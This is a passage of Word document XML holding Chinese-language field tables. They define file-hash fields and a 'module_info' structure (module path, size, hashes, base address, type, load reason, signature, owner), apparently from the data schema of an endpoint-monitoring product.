      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24FA58FF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A646508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0884CFBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A21FB05" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A7D099" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="391DB106" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3334F931" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12489C61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A3E4F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5893CC9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7BA2F742" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="431D1509" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBCDCA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6169B919" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FEEEA65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="232A6F31" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F4A5A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0582AE57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0166F076" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6523A2D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56E1AC46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DF87761" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30089024" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="538E8EFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F107EEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="164C189C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A9AEE65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B860ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="006B1B79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2809AD5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0058DF85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="moduleinfo数据结构"/>
      <w:bookmarkEnd w:id="250"/>
      <w:r>
        <w:t>module_info数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="54860B7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C83AE0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B8D173" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5747F32E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E4913B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78ADB772" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35722EFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7881958B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E52FC72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AB5A22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56FA2D44" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B637C3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A1F252" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DA1C8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F85B193" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BE3C67E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A773E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>module_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711540F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="576A802D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC41198" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47713736" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C429430" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713BA2B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17DD556B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="212299C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块md5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F65AE86" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5FF200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D3CC9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C5D31A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E4670E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C4B345B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE5207A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_base_str</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="631B9AF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35151434" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04B4EF41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FCFBFC2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C24532F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>module_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="789820E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F32BD77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589B7B22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块类型 0 普通模块 1 普通WOW64模块 2 内核模块 3 映像映射 4 文件映射</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6E3CCD31" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFC71B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>load_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52A30CBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542C7C49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A8DD40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>加载时间，时间戳，精确到秒（需要win8以上版本系统，且驱动模块无效）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="780815A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D98D50D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>load_reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B321E20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CBA99A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA46D77" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>加载原因（需要win8以上版本系统，且驱动模块无效） 0 静态依赖 1 静态代理依赖 2 动态代理依赖 3 动态依赖 4 动态加载 5 作为映像加载 6 作为数据加载 其他值：未知原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4EA651D6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6933233F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69DC0CAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39DEBB5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C69DF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2781D8E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9E616C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="200C4E8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="132DE9F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6375566F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B850D45" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B6A39E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="753C5105" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FD218E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AFD1E6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0F263FA2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A5AE99C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CC0BB79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78E4D477" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
